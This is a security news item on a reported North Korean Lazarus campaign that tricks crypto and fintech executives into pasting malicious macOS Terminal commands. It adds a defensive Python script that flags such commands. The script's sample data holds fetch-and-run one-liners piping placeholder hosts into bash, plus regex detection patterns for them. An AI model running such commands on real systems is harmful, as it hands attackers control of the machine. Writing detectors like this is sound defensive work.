North Korea's Lazarus Group Deploys macOS Malware to Hunt Crypto, Fintech Executives
Odaily Planet Daily reports that CertiK has detected a Lazarus Group campaign dubbed "MachO Man" aimed at executives in fintech and cryptocurrency. The operation uses "ClickFix" social engineering, luring targets with bogus online meeting invitations and persuading them to paste "fix" commands into macOS Terminal, allowing attackers to breach corporate and financial systems.
CertiK researcher Natalie Newson said Lazarus has stolen more than $500 million over the past two weeks through attacks involving Drift and KelpDAO. MachO Man is described as a modular macOS malware toolkit built by Chollima, a Lazarus subgroup, and is designed to self-delete after execution to reduce the chance of detection.
CertiK added that the campaign has also been carried out by hijacking DeFi project domains and swapping in fake Cloudflare notices to facilitate the lure.
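The ClickFix lure described above works only if the victim runs a pasted one-liner, and the report notes the payload removes itself afterwards, so the most durable evidence on an endpoint is often the command line itself (shell history, a process-execution log, or an EDR telemetry stream). The following script is an added example, not CertiK's tooling and not an indicator set from the "MachO Man" campaign: it applies generic heuristics for paste-and-run patterns (network fetch piped straight into a shell, base64-decoded text piped into a shell, a binary made executable, run, and then deleted) to a handful of constructed sample command lines. The sample lines, the hostnames, and the pattern names are all invented for the demonstration.

```python
import re
from typing import Dict, List

# Constructed sample command lines, as they might appear in ~/.zsh_history or a
# process-execution log. None of these are real indicators from any campaign;
# the base64 blob simply decodes to "echo hi".
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    "curl -fsSL https://meeting-fix.example/fix.sh | bash",
    "echo 'ZWNobyBoaQ==' | base64 -d | sh",
    "bash -c 'curl -s https://cdn.example/upd -o /tmp/.upd && chmod +x /tmp/.upd "
    "&& /tmp/.upd; rm -f /tmp/.upd'",
    "git pull origin main",
    "osascript -e 'display dialog \"Zoom needs a quick fix\"'",
]

# Generic heuristics for ClickFix-style one-liners. These are assumptions about
# what a pasted "fix" command tends to look like, not signatures for MachO Man.
PATTERNS: Dict[str, re.Pattern] = {
    # curl/wget output piped directly into sh, bash or zsh
    "remote_fetch_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"
    ),
    # base64-decoded text piped into a shell (macOS base64 accepts -D or -d)
    "base64_decoded_to_shell": re.compile(
        r"base64\s+(-d|--decode|-D)[^|]*\|\s*(ba|z)?sh\b"
    ),
    # a file is made executable, executed, then deleted in the same command,
    # which matches the self-deleting behaviour the report describes
    "exec_then_self_delete": re.compile(
        r"chmod\s+\+x\s+(\S+).*\1.*\brm\s+(-f\s+)?\1"
    ),
    # dot-prefixed (hidden) file under /tmp
    "tmp_hidden_executable": re.compile(r"/tmp/\.\S+"),
}


def classify(command: str) -> List[str]:
    """Return the names of the heuristics that a single command line trips."""
    return [name for name, rx in PATTERNS.items() if rx.search(command)]


def scan(commands: List[str]) -> List[Dict[str, object]]:
    """Return only the command lines that trip at least one heuristic,
    each paired with the list of indicators that matched."""
    hits: List[Dict[str, object]] = []
    for cmd in commands:
        matched = classify(cmd)
        if matched:
            hits.append({"command": cmd, "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMANDS):
        print(f"{', '.join(hit['indicators'])}: {hit['command']}")
```

Run against the constructed sample, three of the six lines are flagged and the ordinary `ls`, `git` and `osascript` commands pass through untouched. The same `classify` function can be pointed at the command-line field of whatever process telemetry a fleet already collects; the value of the approach is that it keys on the paste-and-run shape of the lure rather than on a hash or domain that a self-deleting, domain-hopping campaign will have rotated by the time an indicator feed is published.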